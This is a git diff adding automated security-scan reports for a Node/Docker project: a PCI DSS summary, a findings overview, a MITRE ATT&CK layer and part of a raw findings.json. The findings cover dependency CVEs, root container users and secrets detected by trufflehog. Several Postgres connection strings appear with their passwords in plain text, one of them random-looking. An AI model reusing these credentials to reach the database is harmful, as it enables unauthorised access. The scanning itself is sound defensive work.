8.2.1: Verify user identity before credential modification + +**Priority:** HIGH +**Findings:** 41 + +- **MEDIUM**: 41 findings + +**Top Findings:** + +1. **[MEDIUM]** `Postgres` - postgresql://postgres:24DY&1u5FLCkNMeiO_p@postgres:5432 + - Location: `/scan/.env.docker.production.example:0` + +2. **[MEDIUM]** `Postgres` - postgresql://postgres:password@postgres:5432 + - Location: `/scan/.env.local:0` + +3. **[MEDIUM]** `Postgres` - postgresql://postgres:password@postgres:5432 + - Location: `/scan/.env.docker.dev:0` + +4. **[MEDIUM]** `Postgres` - postgresql://postgres:password@postgres:5432 + - Location: `/scan/.env.docker.test:0` + +5. **[MEDIUM]** `Postgres` - postgresql://postgres:password@postgres:5432 + - Location: `/scan/.git/objects/36/f1f2601e97763eb410cb11da1550822df5da7c:0` + +--- + +### Requirement 8.3.2: Strong cryptography for authentication credentials + +**Priority:** CRITICAL +**Findings:** 41 + +- **MEDIUM**: 41 findings + +**Top Findings:** + +1. **[MEDIUM]** `Postgres` - postgresql://postgres:24DY&1u5FLCkNMeiO_p@postgres:5432 + - Location: `/scan/.env.docker.production.example:0` + +2. **[MEDIUM]** `Postgres` - postgresql://postgres:password@postgres:5432 + - Location: `/scan/.env.local:0` + +3. **[MEDIUM]** `Postgres` - postgresql://postgres:password@postgres:5432 + - Location: `/scan/.env.docker.dev:0` + +4. **[MEDIUM]** `Postgres` - postgresql://postgres:password@postgres:5432 + - Location: `/scan/.env.docker.test:0` + +5. **[MEDIUM]** `Postgres` - postgresql://postgres:password@postgres:5432 + - Location: `/scan/.git/objects/36/f1f2601e97763eb410cb11da1550822df5da7c:0` + +--- + +### Requirement 11.3.1: Internal vulnerability scans are performed + +**Priority:** HIGH +**Findings:** 671 + +- **CRITICAL**: 1 findings +- **HIGH**: 21 findings +- **MEDIUM**: 18 findings + +**Top Findings:** + +1. **[LOW]** `CVE-2026-3449` - @tootallnate/once: @tootallnate/once: Denial of Service due to incorrect control flow scoping with A + - Location: `package-lock.json:0` + +2. **[HIGH]** `CVE-2026-44665` - fast-xml-builder: fast-xml-builder: Attribute injection leading to information disclosure or content + - Location: `package-lock.json:0` + +3. **[MEDIUM]** `CVE-2026-44664` - fast-xml-builder: fast-xml-builder: Arbitrary XML/HTML injection via insufficient sanitization of XM + - Location: `package-lock.json:0` + +4. **[HIGH]** `CVE-2025-47935` - Multer vulnerable to Denial of Service via memory leaks from unclosed streams + - Location: `package-lock.json:0` + +5. **[HIGH]** `CVE-2025-47944` - Multer vulnerable to Denial of Service from maliciously crafted requests + - Location: `package-lock.json:0` + +--- + +## Recommendations + +### Critical Actions Required + +The following PCI DSS requirements have CRITICAL findings that must be addressed immediately: + +1. **Requirement 6.3.3**: Security vulnerabilities are identified and managed + - 1 CRITICAL findings + +1. **Requirement 11.3.1**: Internal vulnerability scans are performed + - 1 CRITICAL findings + +### Compliance Status + +- **Requirements Passed**: N/A (manual validation required) +- **Requirements with Findings**: 5 +- **Requirements Not Tested**: N/A (scope determined by organization) + +### Next Steps + +1. **Remediate CRITICAL findings** within 24 hours (per PCI DSS remediation SLAs) +2. **Remediate HIGH findings** within 7 days +3. **Document compensating controls** for accepted risks +4. **Re-scan** after remediation to verify fixes +5. **Submit ASV scan report** to Qualified Security Assessor (if applicable) + +--- + +*This report was generated by JMo Security Audit Tool Suite.* +*Report generation date: Auto-generated* diff --git a/results/summaries/SUMMARY.md b/results/summaries/SUMMARY.md new file mode 100644 index 0000000..97a9f5b --- /dev/null +++ b/results/summaries/SUMMARY.md @@ -0,0 +1,76 @@ +# Security Summary + +Total findings: 712 | 🔴 1 CRITICAL | 🔴 21 HIGH | 🟡 59 MEDIUM | ⚪ 9 LOW + +## Top Risks by File + +| File | Findings | Severity | Top Issue | +|------|----------|----------|-----------| +| package-lock.json | 43 | 🔴 CRITICAL | CVE-2026-3449 | +| Dockerfile.dev | 2 | 🔴 HIGH | Image user should not be 'root' | +| Dockerfile.production | 2 | 🔴 HIGH | Image user should not be 'root' | +| Dockerfile.test | 2 | 🔴 HIGH | Image user should not be 'root' | +| /scan/node_modules/zod/...emplate-literal.test.ts | 6 | 🟡 MEDIUM | MongoDB (6×) | +| /scan/node_modules/@types/node/url.d.ts | 3 | 🟡 MEDIUM | URI (3×) | +| /scan/node_modules/fire...es/@types/node/url.d.ts | 3 | 🟡 MEDIUM | URI (3×) | +| /scan/.env.docker.production.example | 1 | 🟡 MEDIUM | Postgres | +| /scan/.env.local | 1 | 🟡 MEDIUM | Postgres | +| /scan/.env.docker.dev | 1 | 🟡 MEDIUM | Postgres | + +## By Severity + +- 🔴 CRITICAL: 1 +- 🔴 HIGH: 21 +- 🟡 MEDIUM: 59 +- ⚪ LOW: 9 +- 🔵 INFO: 622 + +## Priority Analysis (EPSS/KEV) + +Real-world exploit intelligence to focus on actual threats: + +### 📊 High Exploit Probability: 2 CVEs + +CVEs with >50% probability of being exploited in the next 30 days: + +- 🔴 **CVE-2025-29927** (EPSS: 92.1%, 100th percentile) + - File: `package-lock.json` +- 🔴 **CVE-2024-51479** (EPSS: 78.5%, 99th percentile) + - File: `package-lock.json` + +### Priority Distribution + +- 🔴 Critical Priority (≥80): 2 +- 🟠 High Priority (60-79): 1 +- 🟡 Medium Priority (40-59): 0 +- ⚪ Low Priority (<40): 709 + +## By Tool + +- **syft**: 622 findings (🔵 622 INFO) +- **trivy**: 49 findings (🔴 1 CRITICAL, 🔴 21 HIGH, 🟡 18 MEDIUM, ⚪ 9 LOW) +- **trufflehog**: 41 findings (🟡 41 MEDIUM) + +## Remediation Priorities + +1. **Fix Image user should not be 'root'** (3 findings) → Review container security best practices +2. **Update vulnerable dependencies** (19 CRITICAL/HIGH CVEs) → Run package updates + +## By Category + +- 📦 Other: 622 findings (87% of total) +- 🛡️ Vulnerabilities: 49 findings (7% of total) +- 🔑 Secrets: 41 findings (6% of total) + +## Top Rules + +- SBOM.PACKAGE: 622 +- Postgres: 13 +- URI: 13 +- MongoDB: 8 +- GitHubOauth2: 5 +- Image user should not be 'root': 3 +- No HEALTHCHECK defined: 3 +- GCP: 1 +- Circle: 1 +- CVE-2026-3449: 1 diff --git a/results/summaries/attack-navigator.json b/results/summaries/attack-navigator.json new file mode 100644 index 0000000..26232ed --- /dev/null +++ b/results/summaries/attack-navigator.json @@ -0,0 +1,121 @@ +{ + "name": "JMo Security Scan Results", + "versions": { + "attack": "17", + "navigator": "5.1.0", + "layer": "4.5" + }, + "domain": "enterprise-attack", + "description": "Security findings mapped to MITRE ATT&CK techniques. Total findings: 712, Techniques covered: 4", + "filters": { + "platforms": [ + "Linux", + "macOS", + "Windows", + "Cloud", + "Containers" + ] + }, + "sorting": 3, + "layout": { + "layout": "side", + "aggregateFunction": "average", + "showID": true, + "showName": true, + "showAggregateScores": false, + "countUnscored": false + }, + "hideDisabled": false, + "techniques": [ + { + "techniqueID": "T1552.001", + "tactic": "credential-access", + "score": 6.110283159463488, + "color": "#99ccff", + "comment": "41 finding(s) detected", + "enabled": true, + "metadata": [ + { + "name": "Findings", + "value": "41" + } + ], + "showSubtechniques": true + }, + { + "techniqueID": "T1078", + "tactic": "initial-access", + "score": 6.110283159463488, + "color": "#99ccff", + "comment": "41 finding(s) detected", + "enabled": true, + "metadata": [ + { + "name": "Findings", + "value": "41" + } + ], + "showSubtechniques": false + }, + { + "techniqueID": "T1195.001", + "tactic": "initial-access", + "score": 100, + "color": "#ff6666", + "comment": "671 finding(s) detected", + "enabled": true, + "metadata": [ + { + "name": "Findings", + "value": "671" + } + ], + "showSubtechniques": true + }, + { + "techniqueID": "T1190", + "tactic": "initial-access", + "score": 0.44709388971684055, + "color": "#99ccff", + "comment": "3 finding(s) detected", + "enabled": true, + "metadata": [ + { + "name": "Findings", + "value": "3" + } + ], + "showSubtechniques": false + } + ], + "gradient": { + "colors": [ + "#99ccff", + "#ffcc66", + "#ff9966", + "#ff6666" + ], + "minValue": 0, + "maxValue": 100 + }, + "legendItems": [ + { + "label": "Total Findings: 712", + "color": "#ffffff" + }, + { + "label": "Techniques Covered: 4", + "color": "#ffffff" + } + ], + "metadata": [ + { + "name": "Generated by", + "value": "JMo Security Audit Tool Suite" + } + ], + "showTacticRowBackground": true, + "tacticRowBackground": "#dddddd", + "selectTechniquesAcrossTactics": true, + "selectSubtechniquesWithParent": true +} \ No newline at end of file diff --git a/results/summaries/dashboard.html b/results/summaries/dashboard.html new file mode 100644 index 0000000..bd1b55a --- /dev/null +++ b/results/summaries/dashboard.html @@ -0,0 +1,50 @@ + + + + + + JMo Security - Findings Report + + + +

JMo Security Findings Report

+
+ ⚠️ Fallback HTML Mode
+ This is a simplified HTML report. The interactive React dashboard was not available.
+ To view the full interactive dashboard, build the React app with npm run build in scripts/dashboard/. +
+
+

Summary

+

Total Findings: 712

+

For detailed findings, please view the JSON report at findings.json.

+
+ + diff --git a/results/summaries/findings.json b/results/summaries/findings.json new file mode 100644 index 0000000..bcbfd1c --- /dev/null +++ b/results/summaries/findings.json @@ -0,0 +1,114218 @@ +{ + "meta": { + "output_version": "1.0.0", + "jmo_version": "1.0.5", + "schema_version": "1.2.0", + "timestamp": "2026-05-21T06:36:10.198780Z", + "scan_id": "202284b8-0052-4181-970d-ee2285144fcf", + "profile": "", + "tools": [ + "checkov", + "hadolint", + "semgrep", + "syft", + "trivy", + "trufflehog", + "zap" + ], + "target_count": 1, + "finding_count": 712, + "platform": "Linux" + }, + "findings": [ + { + "schemaVersion": "1.2.0", + "id": "d818f4846421d653", + "ruleId": "Postgres", + "severity": "MEDIUM", + "tool": { + "name": "trufflehog", + "version": "unknown" + }, + "location": { + "path": "/scan/.env.docker.production.example", + "startLine": 0 + }, + "message": "postgresql://postgres:24DY&1u5FLCkNMeiO_p@postgres:5432", + "title": "Postgres secret", + "description": "Potential secret detected by TruffleHog", + "remediation": "Rotate credentials and purge from history.", + "references": [], + "tags": [ + "secrets", + "unverified" + ], + "risk": { + "cwe": [ + "CWE-798" + ], + "confidence": "MEDIUM", + "likelihood": "HIGH", + "impact": "HIGH" + }, + "raw": { + "SourceMetadata": { + "Data": { + "Filesystem": { + "file": "/scan/.env.docker.production.example", + "line": 9 + } + } + }, + "SourceID": 1, + "SourceType": 15, + "SourceName": "trufflehog - filesystem", + "DetectorType": 968, + "DetectorName": "Postgres", + "DetectorDescription": "Postgres connection string containing credentials", + "DecoderName": "PLAIN", + "Verified": false, + "VerificationError": "lookup postgres on 192.168.65.7:53: no such host", + "VerificationFromCache": false, + "Raw": "postgresql://postgres:24DY&1u5FLCkNMeiO_p@postgres:5432", + "RawV2": "postgresql://postgres:24DY&1u5FLCkNMeiO_p@postgres:5432", + "Redacted": "", + "ExtraData": { + "sslmode": "" + }, + "StructuredData": null + }, + "compliance": { + "owaspTop10_2021": [ + "A02:2021" + ], + "cweTop25_2024": [ + { + "id": "CWE-798", + "rank": 18, + "category": "Credentials" + } + ], + "cisControlsV8_1": [ + { + "control": "3.11", + "title": "Encrypt Sensitive Data at Rest", + "implementationGroup": "IG1" + }, + { + "control": "5.4", + "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", + "implementationGroup": "IG1" + } + ], + "nistCsf2_0": [ + { + "function": "PROTECT", + "category": "PR.AC", + "subcategory": "PR.AC-1", + "description": "Identities and credentials are issued, managed, verified, revoked, and audited" + }, + { + "function": "PROTECT", + "category": "PR.DS", + "subcategory": "PR.DS-1", + "description": "Data-at-rest is protected" + } + ], + "pciDss4_0": [ + { + "requirement": "8.3.2", + "description": "Strong cryptography for authentication credentials", + "priority": "CRITICAL" + }, + { + "requirement": "8.2.1", + "description": "Verify user identity before credential modification", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Credential Access", + "technique": "T1552", + "techniqueName": "Unsecured Credentials", + "subtechnique": "T1552.001", + "subtechniqueName": "Credentials in Files" + }, + { + "tactic": "Initial Access", + "technique": "T1078", + "techniqueName": "Valid Accounts", + "subtechnique": "", + "subtechniqueName": "" + } + ] + }, + "priority": { + "priority": 13.333333333333332, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 4, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "35ed8d11af314afa", + "ruleId": "Postgres", + "severity": "MEDIUM", + "tool": { + "name": "trufflehog", + "version": "unknown" + }, + "location": { + "path": "/scan/.env.local", + "startLine": 0 + }, + "message": "postgresql://postgres:password@postgres:5432", + "title": "Postgres secret", + "description": "Potential secret detected by TruffleHog", + "remediation": "Rotate credentials and purge from history.", + "references": [], + "tags": [ + "secrets", + "unverified" + ], + "risk": { + "cwe": [ + "CWE-798" + ], + "confidence": "MEDIUM", + "likelihood": "HIGH", + "impact": "HIGH" + }, + "raw": { + "SourceMetadata": { + "Data": { + "Filesystem": { + "file": "/scan/.env.local", + "line": 1 + } + } + }, + "SourceID": 1, + "SourceType": 15, + "SourceName": "trufflehog - filesystem", + "DetectorType": 968, + "DetectorName": "Postgres", + "DetectorDescription": "Postgres connection string containing credentials", + "DecoderName": "PLAIN", + "Verified": false, + "VerificationError": "lookup postgres on 192.168.65.7:53: no such host", + "VerificationFromCache": false, + "Raw": "postgresql://postgres:password@postgres:5432", + "RawV2": "postgresql://postgres:password@postgres:5432", + "Redacted": "", + "ExtraData": { + "sslmode": "" + }, + "StructuredData": null + }, + "compliance": { + "owaspTop10_2021": [ + "A02:2021" + ], + "cweTop25_2024": [ + { + "id": "CWE-798", + "rank": 18, + "category": "Credentials" + } + ], + "cisControlsV8_1": [ + { + "control": "3.11", + "title": "Encrypt Sensitive Data at Rest", + "implementationGroup": "IG1" + }, + { + "control": "5.4", + "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", + "implementationGroup": "IG1" + } + ], + "nistCsf2_0": [ + { + "function": "PROTECT", + "category": "PR.AC", + "subcategory": "PR.AC-1", + "description": "Identities and credentials are issued, managed, verified, revoked, and audited" + }, + { + "function": "PROTECT", + "category": "PR.DS", + "subcategory": "PR.DS-1", + "description": "Data-at-rest is protected" + } + ], + "pciDss4_0": [ + { + "requirement": "8.3.2", + "description": "Strong cryptography for authentication credentials", + "priority": "CRITICAL" + }, + { + "requirement": "8.2.1", + "description": "Verify user identity before credential modification", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Credential Access", + "technique": "T1552", + "techniqueName": "Unsecured Credentials", + "subtechnique": "T1552.001", + "subtechniqueName": "Credentials in Files" + }, + { + "tactic": "Initial Access", + "technique": "T1078", + "techniqueName": "Valid Accounts", + "subtechnique": "", + "subtechniqueName": "" + } + ] + }, + "priority": { + "priority": 13.333333333333332, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 4, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "48b308b8dd5acde8", + "ruleId": "Postgres", + "severity": "MEDIUM", + "tool": { + "name": "trufflehog", + "version": "unknown" + }, + "location": { + "path": "/scan/.env.docker.dev", + "startLine": 0 + }, + "message": "postgresql://postgres:password@postgres:5432", + "title": "Postgres secret", + "description": "Potential secret detected by TruffleHog", + "remediation": "Rotate credentials and purge from history.", + "references": [], + "tags": [ + "secrets", + "unverified" + ], + "risk": { + "cwe": [ + "CWE-798" + ], + "confidence": "MEDIUM", + "likelihood": "HIGH", + "impact": "HIGH" + }, + "raw": { + "SourceMetadata": { + "Data": { + "Filesystem": { + "file": "/scan/.env.docker.dev", + "line": 1 + } + } + }, + "SourceID": 1, + "SourceType": 15, + "SourceName": "trufflehog - filesystem", + "DetectorType": 968, + "DetectorName": "Postgres", + "DetectorDescription": "Postgres connection string containing credentials", + "DecoderName": "PLAIN", + "Verified": false, + "VerificationError": "lookup postgres on 192.168.65.7:53: no such host", + "VerificationFromCache": false, + "Raw": "postgresql://postgres:password@postgres:5432", + "RawV2": "postgresql://postgres:password@postgres:5432", + "Redacted": "", + "ExtraData": { + "sslmode": "" + }, + "StructuredData": null + }, + "compliance": { + "owaspTop10_2021": [ + "A02:2021" + ], + "cweTop25_2024": [ + { + "id": "CWE-798", + "rank": 18, + "category": "Credentials" + } + ], + "cisControlsV8_1": [ + { + "control": "3.11", + "title": "Encrypt Sensitive Data at Rest", + "implementationGroup": "IG1" + }, + { + "control": "5.4", + "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", + "implementationGroup": "IG1" + } + ], + "nistCsf2_0": [ + { + "function": "PROTECT", + "category": "PR.AC", + "subcategory": "PR.AC-1", + "description": "Identities and credentials are issued, managed, verified, revoked, and audited" + }, + { + "function": "PROTECT", + "category": "PR.DS", + "subcategory": "PR.DS-1", + "description": "Data-at-rest is protected" + } + ], + "pciDss4_0": [ + { + "requirement": "8.3.2", + "description": "Strong cryptography for authentication credentials", + "priority": "CRITICAL" + }, + { + "requirement": "8.2.1", + "description": "Verify user identity before credential modification", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Credential Access", + "technique": "T1552", + "techniqueName": "Unsecured Credentials", + "subtechnique": "T1552.001", + "subtechniqueName": "Credentials in Files" + }, + { + "tactic": "Initial Access", + "technique": "T1078", + "techniqueName": "Valid Accounts", + "subtechnique": "", + "subtechniqueName": "" + } + ] + }, + "priority": { + "priority": 13.333333333333332, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 4, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "1c16bda367ac0bd8", + "ruleId": "Postgres", + "severity": "MEDIUM", + "tool": { + "name": "trufflehog", + "version": "unknown" + }, + "location": { + "path": "/scan/.env.docker.test", + "startLine": 0 + }, + "message": "postgresql://postgres:password@postgres:5432", + "title": "Postgres secret", + "description": "Potential secret detected by TruffleHog", + "remediation": "Rotate credentials and purge from history.", + "references": [], + "tags": [ + "secrets", + "unverified" + ], + "risk": { + "cwe": [ + "CWE-798" + ], + "confidence": "MEDIUM", + "likelihood": "HIGH", + "impact": "HIGH" + }, + "raw": { + "SourceMetadata": { + "Data": { + "Filesystem": { + "file": "/scan/.env.docker.test", + "line": 1 + } + } + }, + "SourceID": 1, + "SourceType": 15, + "SourceName": "trufflehog - filesystem", + "DetectorType": 968, + "DetectorName": "Postgres", + "DetectorDescription": "Postgres connection string containing credentials", + "DecoderName": "PLAIN", + "Verified": false, + "VerificationError": "lookup postgres on 192.168.65.7:53: no such host", + "VerificationFromCache": false, + "Raw": "postgresql://postgres:password@postgres:5432", + "RawV2": "postgresql://postgres:password@postgres:5432", + "Redacted": "", + "ExtraData": { + "sslmode": "" + }, + "StructuredData": null + }, + "compliance": { + "owaspTop10_2021": [ + "A02:2021" + ], + "cweTop25_2024": [ + { + "id": "CWE-798", + "rank": 18, + "category": "Credentials" + } + ], + "cisControlsV8_1": [ + { + "control": "3.11", + "title": "Encrypt Sensitive Data at Rest", + "implementationGroup": "IG1" + }, + { + "control": "5.4", + "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", + "implementationGroup": "IG1" + } + ], + "nistCsf2_0": [ + { + "function": "PROTECT", + "category": "PR.AC", + "subcategory": "PR.AC-1", + "description": "Identities and credentials are issued, managed, verified, revoked, and audited" + }, + { + "function": "PROTECT", + "category": "PR.DS", + "subcategory": "PR.DS-1", + "description": "Data-at-rest is protected" + } + ], + "pciDss4_0": [ + { + "requirement": "8.3.2", + "description": "Strong cryptography for authentication credentials", + "priority": "CRITICAL" + }, + { + "requirement": "8.2.1", + "description": "Verify user identity before credential modification", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Credential Access", + "technique": "T1552", + "techniqueName": "Unsecured Credentials", + "subtechnique": "T1552.001", + "subtechniqueName": "Credentials in Files" + }, + { + "tactic": "Initial Access", + "technique": "T1078", + "techniqueName": "Valid Accounts", + "subtechnique": "", + "subtechniqueName": "" + } + ] + }, + "priority": { + "priority": 13.333333333333332, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 4, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "deeba988a9ab6141", + "ruleId": "Postgres", + "severity": "MEDIUM", + "tool": { + "name": "trufflehog", + "version": "unknown" + }, + "location": { + "path": "/scan/.git/objects/36/f1f2601e97763eb410cb11da1550822df5da7c", + "startLine": 0 + }, + "message": "postgresql://postgres:password@postgres:5432", + "title": "Postgres secret", + "description": "Potential secret detected by TruffleHog", + "remediation": "Rotate credentials and purge from history.", + "references": [], + "tags": [ + "secrets", + "unverified" + ], + "risk": { + "cwe": [ + "CWE-798" + ], + "confidence": "MEDIUM", + "likelihood": "HIGH", + "impact": "HIGH" + }, + "raw": { + "SourceMetadata": { + "Data": { + "Filesystem": { + "file": "/scan/.git/objects/36/f1f2601e97763eb410cb11da1550822df5da7c", + "line": 1 + } + } + }, + "SourceID": 1, + "SourceType": 15, + "SourceName": "trufflehog - filesystem", + "DetectorType": 968, + "DetectorName": "Postgres", + "DetectorDescription": "Postgres connection string containing credentials", + "DecoderName": "PLAIN", + "Verified": false, + "VerificationError": "lookup postgres on 192.168.65.7:53: no such host", + "VerificationFromCache": true, + "Raw": "postgresql://postgres:password@postgres:5432", + "RawV2": "postgresql://postgres:password@postgres:5432", + "Redacted": "", + "ExtraData": { + "sslmode": "" + }, + "StructuredData": null + }, + "compliance": { + "owaspTop10_2021": [ + "A02:2021" + ], + "cweTop25_2024": [ + { + "id": "CWE-798", + "rank": 18, + "category": "Credentials" + } + ], + "cisControlsV8_1": [ + { + "control": "3.11", + "title": "Encrypt Sensitive Data at Rest", + "implementationGroup": "IG1" + }, + { + "control": "5.4", + "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", + "implementationGroup": "IG1" + } + ], + "nistCsf2_0": [ + { + "function": "PROTECT", + "category": "PR.AC", + "subcategory": "PR.AC-1", + "description": "Identities and credentials are issued, managed, verified, revoked, and audited" + }, + { + "function": "PROTECT", + "category": "PR.DS", + "subcategory": "PR.DS-1", + "description": "Data-at-rest is protected" + } + ], + "pciDss4_0": [ + { + "requirement": "8.3.2", + "description": "Strong cryptography for authentication credentials", + "priority": "CRITICAL" + }, + { + "requirement": "8.2.1", + "description": "Verify user identity before credential modification", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Credential Access", + "technique": "T1552", + "techniqueName": "Unsecured Credentials", + "subtechnique": "T1552.001", + "subtechniqueName": "Credentials in Files" + }, + { + "tactic": "Initial Access", + "technique": "T1078", + "techniqueName": "Valid Accounts", + "subtechnique": "", + "subtechniqueName": "" + } + ] + }, + "priority": { + "priority": 13.333333333333332, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 4, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "381c867d67edf2e8", + "ruleId": "Postgres", + "severity": "MEDIUM", + "tool": { + "name": "trufflehog", + "version": "unknown" + }, + "location": { + "path": "/scan/.git/objects/47/697092dbff8805870077515d2ed8c163ee1208", + "startLine": 0 + }, + "message": "postgresql://postgres:change-me@postgres:5432", + "title": "Postgres secret", + "description": "Potential secret detected by TruffleHog", + "remediation": "Rotate credentials and purge from history.", + "references": [], + "tags": [ + "secrets", + "unverified" + ], + "risk": { + "cwe": [ + "CWE-798" + ], + "confidence": "MEDIUM", + "likelihood": "HIGH", + "impact": "HIGH" + }, + "raw": { + "SourceMetadata": { + "Data": { + "Filesystem": { + "file": "/scan/.git/objects/47/697092dbff8805870077515d2ed8c163ee1208", + "line": 7 + } + } + }, + "SourceID": 1, + "SourceType": 15, + "SourceName": "trufflehog - filesystem", + "DetectorType": 968, + "DetectorName": "Postgres", + "DetectorDescription": "Postgres connection string containing credentials", + "DecoderName": "PLAIN", + "Verified": false, + "VerificationError": "lookup postgres on 192.168.65.7:53: no such host", + "VerificationFromCache": false, + "Raw": "postgresql://postgres:change-me@postgres:5432", + "RawV2": "postgresql://postgres:change-me@postgres:5432", + "Redacted": "", + "ExtraData": { + "sslmode": "" + }, + "StructuredData": null + }, + "compliance": { + "owaspTop10_2021": [ + "A02:2021" + ], + "cweTop25_2024": [ + { + "id": "CWE-798", + "rank": 18, + "category": "Credentials" + } + ], + "cisControlsV8_1": [ + { + "control": "3.11", + "title": "Encrypt Sensitive Data at Rest", + "implementationGroup": "IG1" + }, + { + "control": "5.4", + "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", + "implementationGroup": "IG1" + } + ], + "nistCsf2_0": [ + { + "function": "PROTECT", + "category": "PR.AC", + "subcategory": "PR.AC-1", + "description": "Identities and credentials are issued, managed, verified, revoked, and audited" + }, + { + "function": "PROTECT", + "category": "PR.DS", + "subcategory": "PR.DS-1", + "description": "Data-at-rest is protected" + } + ], + "pciDss4_0": [ + { + "requirement": "8.3.2", + "description": "Strong cryptography for authentication credentials", + "priority": "CRITICAL" + }, + { + "requirement": "8.2.1", + "description": "Verify user identity before credential modification", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Credential Access", + "technique": "T1552", + "techniqueName": "Unsecured Credentials", + "subtechnique": "T1552.001", + "subtechniqueName": "Credentials in Files" + }, + { + "tactic": "Initial Access", + "technique": "T1078", + "techniqueName": "Valid Accounts", + "subtechnique": "", + "subtechniqueName": "" + } + ] + }, + "priority": { + "priority": 13.333333333333332, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 4, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "edccc43a23cfabf6", + "ruleId": "Postgres", + "severity": "MEDIUM", + "tool": { + "name": "trufflehog", + "version": "unknown" + }, + "location": { + "path": "/scan/.git/objects/a6/51df8466618dadf92f1ce74d707093a9a8ec14", + "startLine": 0 + }, + "message": "postgresql://postgres:password@postgres:5432", + "title": "Postgres secret", + "description": "Potential secret detected by TruffleHog", + "remediation": "Rotate credentials and purge from history.", + "references": [], + "tags": [ + "secrets", + "unverified" + ], + "risk": { + "cwe": [ + "CWE-798" + ], + "confidence": "MEDIUM", + "likelihood": "HIGH", + "impact": "HIGH" + }, + "raw": { + "SourceMetadata": { + "Data": { + "Filesystem": { + "file": "/scan/.git/objects/a6/51df8466618dadf92f1ce74d707093a9a8ec14", + "line": 1 + } + } + }, + "SourceID": 1, + "SourceType": 15, + "SourceName": "trufflehog - filesystem", + "DetectorType": 968, + "DetectorName": "Postgres", + "DetectorDescription": "Postgres connection string containing credentials", + "DecoderName": "PLAIN", + "Verified": false, + "VerificationError": "lookup postgres on 192.168.65.7:53: no such host", + "VerificationFromCache": true, + "Raw": "postgresql://postgres:password@postgres:5432", + "RawV2": "postgresql://postgres:password@postgres:5432", + "Redacted": "", + "ExtraData": { + "sslmode": "" + }, + "StructuredData": null + }, + "compliance": { + "owaspTop10_2021": [ + "A02:2021" + ], + "cweTop25_2024": [ + { + "id": "CWE-798", + "rank": 18, + "category": "Credentials" + } + ], + "cisControlsV8_1": [ + { + "control": "3.11", + "title": "Encrypt Sensitive Data at Rest", + "implementationGroup": "IG1" + }, + { + "control": "5.4", + "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", + "implementationGroup": "IG1" + } + ], + "nistCsf2_0": [ + { + "function": "PROTECT", + "category": "PR.AC", + "subcategory": "PR.AC-1", + "description": "Identities and credentials are issued, managed, verified, revoked, and audited" + }, + { + "function": "PROTECT", + "category": "PR.DS", + "subcategory": "PR.DS-1", + "description": "Data-at-rest is protected" + } + ], + "pciDss4_0": [ + { + "requirement": "8.3.2", + "description": "Strong cryptography for authentication credentials", + "priority": "CRITICAL" + }, + { + "requirement": "8.2.1", + "description": "Verify user identity before credential modification", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Credential Access", + "technique": "T1552", + "techniqueName": "Unsecured Credentials", + "subtechnique": "T1552.001", + "subtechniqueName": "Credentials in Files" + }, + { + "tactic": "Initial Access", + "technique": "T1078", + "techniqueName": "Valid Accounts", + "subtechnique": "", + "subtechniqueName": "" + } + ] + }, + "priority": { + "priority": 13.333333333333332, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 4, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "aae1f539799fb2de", + "ruleId": "Postgres", + "severity": "MEDIUM", + "tool": { + "name": "trufflehog", + "version": "unknown" + }, + "location": { + "path": "/scan/.git/objects/b6/9ad022787c7085aa13ddf46162d90323ed4c06", + "startLine": 0 + }, + "message": "postgresql://postgres:password@postgres:5432", + "title": "Postgres secret", + "description": "Potential secret detected by TruffleHog", + "remediation": "Rotate credentials and purge from history.", + "references": [], + "tags": [ + "secrets", + "unverified" + ], + "risk": { + "cwe": [ + "CWE-798" + ], + "confidence": "MEDIUM", + "likelihood": "HIGH", + "impact": "HIGH" + }, + "raw": { + "SourceMetadata": { + "Data": { + "Filesystem": { + "file": "/scan/.git/objects/b6/9ad022787c7085aa13ddf46162d90323ed4c06", + "line": 1 + } + } + }, + "SourceID": 1, + "SourceType": 15, + "SourceName": "trufflehog - filesystem", + "DetectorType": 968, + "DetectorName": "Postgres", + "DetectorDescription": "Postgres connection string containing credentials", + "DecoderName": "PLAIN", + "Verified": false, + "VerificationError": "lookup 